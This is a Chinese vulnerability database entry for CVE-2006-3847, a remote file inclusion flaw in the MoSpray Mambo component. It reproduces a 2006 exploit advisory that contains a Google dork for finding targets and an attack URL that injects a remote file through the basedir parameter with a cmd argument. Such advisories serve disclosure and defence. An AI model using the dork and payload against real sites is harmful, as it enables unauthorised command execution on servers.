MoSpray组件basedir 'admin.ph'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110665 漏洞类型 代码注入
发布时间 2006-07-23 更新时间 2006-08-08
CVE编号 CVE-2006-3847 CNNVD-ID CNNVD-200607-439
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-439
|漏洞详情
Mospray是用于软件开发的bug跟踪和请求控制台,可完全集成于Mambo等内容管理系统。Mospray处理用户请求时实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。Mospray的components/com_mospray/scripts/admin.php脚本没有basedir参数做充分的检查过滤,远程攻击者可以通过包含本地或外部资源导致执行任意PHP代码。成功的攻击要求启用了register_globals。
|漏洞EXP
>>> Kurdish Security
>>> MoSpray Remote File Include Vulnerability
>>> Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : MoSpray
>>> Site : http://www.caneblu.com
>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends


codes
require("$basedir/components/com_mospray/lang/$lang/admin.php");

d0rkiz : allinurl:"com_mospray"

http://www.site.com/components/com_mospray/scripts/admin.php?basedir=yourcode.txt?&cmd=id

Used link :]

admin.php
details.php
modify.php
newgroup.php
newtask.php
rss.php

e0f

# milw0rm.com [2006-07-23]
|参考资料

来源:XF
名称:mospray-admin-file-include(27917)
链接:http://xforce.iss.net/xforce/xfdb/27917
来源:BID
名称:19122
链接:http://www.securityfocus.com/bid/19122
来源:BUGTRAQ
名称:20060723[KurdishSecurity#14]MoSpray[base_dir]RemoteCommandExecution[Mambo&Joomla]
链接:http://www.securityfocus.com/archive/1/archive/1/440939/100/200/threaded
来源:VUPEN
名称:ADV-2006-2932
链接:http://www.frsirt.com/english/advisories/2006/2932
来源:SECUNIA
名称:21166
链接:http://secunia.com/advisories/21166
来源:MILW0RM
名称:2062
链接:http://milw0rm.com/exploits/2062
来源:MISC
链接:http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html